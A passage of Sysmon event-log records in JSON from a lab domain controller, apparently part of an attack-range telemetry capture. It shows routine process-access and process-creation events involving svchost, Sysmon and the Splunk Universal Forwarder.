08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8361,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8362,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8363,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8364,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8365,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8366,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22CC-5F25-0000-0010888E1100}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22CC-5F25-0000-0010888E1100}","TargetProcessId":"1428","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8367,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nProcessGuid: {41C8662E-22CD-5F25-0000-00104A901100}\r\nProcessId: 4856\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","ProcessGuid":"{41C8662E-22CD-5F25-0000-00104A901100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8368,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-22CD-5F25-0000-00104A901100}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-22CD-5F25-0000-00104A901100}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program 